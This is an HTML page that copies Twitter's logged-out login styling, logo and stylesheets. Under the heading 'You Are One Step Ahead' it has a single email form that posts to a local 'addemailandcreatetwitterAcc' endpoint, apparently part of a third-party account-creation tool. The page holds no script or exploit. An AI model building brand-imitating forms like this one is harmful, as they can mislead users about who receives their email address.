<html lang="en" data-scribe-reduced-action-queue="true"><!--<![endif]-->
<head>
    <meta charset="utf-8">
    <link rel="stylesheet" href="https://abs.twimg.com/a/1408363478/css/t1/twitter_gotham_core.bundle.css">
    <link rel="stylesheet" href="https://abs.twimg.com/a/1408363478/css/t1/twitter_logged_out.bundle.css">
    <title>Enter Email:</title>
    <link href="//abs.twimg.com/favicons/favicon.ico" rel="shortcut icon" type="image/x-icon">
    <link rel="stylesheet" href="https://abs.twimg.com/a/1408363478/css/t1/twitter_more_1.bundle.css">
    <link rel="stylesheet" href="https://abs.twimg.com/a/1408363478/css/t1/twitter_more_2.bundle.css">
    <link rel="stylesheet" href="https://abs.twimg.com/font/gotham-narrow-v3.css">
</head>
<body class="three-col logged-out" data-fouc-class-names="swift-loading" dir="ltr">
<div id="doc" class="route-login login-responsive">
    <div class="topbar js-topbar   ">
        <div id="banners" class="js-banners">
        </div>
        <div class="global-nav" data-section-term="top_nav">
            <div class="global-nav-inner">
                <div class="container">
                    <ul class="nav js-global-actions">
                        <li class="home" data-global-action="t1home"><a class="nav-logo-link" href="javaScript:void(0);" data-nav="front">
                                <span class="Icon Icon--bird"><span class="visuallyhidden">Twitter</span></span> </a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <div id="page-outer">
        <div id="page-container" class="AppContent wrapper wrapper-login white">
            <div class="page-canvas">
                <div class="signin-wrapper" data-login-message="">
                    <h1>You Are One Step Ahead:</h1>

                    <form action="/addemailandcreatetwitterAcc" class="t1-form clearfix signin js-signin" method="post">
                        <fieldset>
                            <legend class="visuallyhidden">Enter Email:</legend>
                            <div class="clearfix field">
                                <input class="js-username-field email-input js-initial-focus" type="text" id="email" name="email"
                                       placeholder="enter email">
                            </div>
                        </fieldset>
                        <div class="captcha js-captcha">
                        </div>
                        <div class="clearfix">
                            <button type="submit" class="submit btn primary-btn">Next</button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>